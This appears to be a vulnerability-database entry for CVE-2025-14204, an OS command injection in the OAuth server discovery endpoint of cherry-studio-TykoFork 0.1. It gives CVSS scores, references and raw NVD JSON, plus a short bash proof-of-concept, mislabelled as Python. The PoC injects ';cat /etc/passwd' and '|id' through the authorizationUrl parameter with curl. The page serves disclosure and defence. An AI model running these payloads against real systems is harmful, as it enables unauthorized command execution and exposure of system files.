CVE-2025-14204

Description

A vulnerability has been found in TykoDev cherry-studio-TykoFork 0.1. This issue affects the function redirectToAuthorization of the file /.well-known/oauth-authorization-server of the component OAuth Server Discovery. Such manipulation of the argument authorizationUrl leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

cherry-studio-TykoFork 0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-14204 PoC - cherry-studio OAuth Server Discovery OS Command Injection
# Affected: TykoDev cherry-studio-TykoFork 0.1
# Component: /.well-known/oauth-authorization-server
# Function: redirectToAuthorization

TARGET_URL="http://target-server:3000"
PAYLOAD=";cat /etc/passwd"

# Method 1: Direct parameter injection via query string
echo "[*] Testing CVE-2025-14204 - OS Command Injection"
echo "[*] Target: $TARGET_URL"
echo "[*] Payload: $PAYLOAD"

curl -v "$TARGET_URL/.well-known/oauth-authorization-server?authorizationUrl=$PAYLOAD" 2>&1

# Method 2: POST request with JSON body
# curl -X POST "$TARGET_URL/.well-known/oauth-authorization-server" \
#   -H "Content-Type: application/json" \
#   -d '{"authorizationUrl":";id"}'

# Method 3: Using pipe command injection
PAYLOAD2="|id"
# curl "$TARGET_URL/.well-known/oauth-authorization-server?authorizationUrl=$PAYLOAD2"

echo "[!] If successful, you should see command output in response"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14204
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14204
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14204/
[4] VulDB https://vuldb.com/cve/CVE-2025-14204
[5] https://lavender-bicycle-a5a.notion.site/TokyoTech-RCE-26153a41781f80b6a370d427a6d307f0
[6] https://vuldb.com/?ctiid.334647
[7] https://vuldb.com/?id.334647
[8] https://vuldb.com/?submit.700182

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14204", "sourceIdentifier": "[email protected]", "published": "2025-12-07T23:15:50.360", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in TykoDev cherry-studio-TykoFork 0.1. This issue affects the function redirectToAuthorization of the file /.well-known/oauth-authorization-server of the component OAuth Server Discovery. Such manipulation of the argument authorizationUrl leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/TokyoTech-RCE-26153a41781f80b6a370d427a6d307f0", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334647", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334647", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.700182", "source": "[email protected]"}]}}